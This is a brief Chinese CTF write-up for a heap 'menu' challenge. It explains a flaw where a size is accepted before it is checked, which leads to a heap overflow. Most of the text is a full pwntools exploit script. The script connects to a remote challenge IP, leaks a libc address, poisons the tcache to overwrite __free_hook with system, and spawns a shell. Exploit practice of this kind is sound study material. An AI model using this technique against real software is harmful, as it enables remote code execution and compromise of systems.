菜单堆
问题就出在当我们输入size之后,size会留下来然后才判断符不符合要求。
所以直接可以堆溢出。
exp
from pwn import*
context.log_level='debug'
context.arch='amd64'
context.os = "linux"
local = 0
if local:
r = process('./main')
else:
r = remote("113.201.14.253",21111)
libc=ELF('/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.4_amd64/libc.so.6')
sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()
lg = lambda name,addr :log.success(name+":"+hex(addr))
def debug():
gdb.attach(r)
pause()
def add(idx, size, content):
sla(">>\n", "1")
sla("idx?\n", str(idx))
sla("size?\n", str(size))
sa("content?\n", content)
def fake_add(idx, size):
sla(">>\n", "1")
sla("idx?\n", str(idx))
sla("size?\n", str(size))
def delete(idx):
sla(">>\n", "2")
sla("idx?\n", str(idx))
def edit(idx, size, content):
sla(">>\n", "3")
sla("idx?\n", str(idx))
sla("size?\n", str(size))
sa("content?\n", content)
def show(idx):
sla(">>\n", "4")
sla("idx?\n", str(idx))
for i in range(8):
add(i, 0xf8, "a")
add(8, 0x10, "a")
for i in range(8):
delete(i)
for i in range(7):
add(i, 0xf8, "a")
fake_add(0, 0x500)
edit(0, 0x300, "a" * 0x100)
show(0)
malloc_hook = (u64(ru('\x7f')[-6:] + '\x00\x00') & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
system_addr = libc_base + libc.sym["system"]
lg("libc_base", libc_base)
delete(2)
fake_add(3, 0x500)
edit(3, 0x300, "a" * 0xf8 + p64(0x101) + p64(free_hook))
add(2, 0xf8, "/bin/sh\x00")
add(9, 0xf8, p64(system_addr))
delete(2)
r.interactive()